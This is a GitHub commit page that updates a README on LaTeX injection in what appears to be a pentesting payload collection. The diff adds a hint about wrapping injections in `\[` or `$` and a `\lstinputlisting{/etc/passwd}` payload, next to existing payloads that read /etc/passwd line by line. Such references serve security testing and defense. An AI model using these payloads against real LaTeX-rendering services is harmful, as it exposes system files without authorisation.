Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
clem9669 committed Jun 29, 2023
1 parent f723ef4 commit fa3cf25
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions LaTeX Injection/README.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,7 @@
# LaTex Injection

You might need to adjust injection with wrappers as `\[` or `$`.

## Read file

Read file and interpret the LaTeX code in it:
Expand All @@ -22,6 +24,7 @@ Read single lined file:
Read multiple lined file:

```tex
\lstinputlisting{/etc/passwd}
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
Expand Down

0 comments on commit fa3cf25

Please sign in to comment.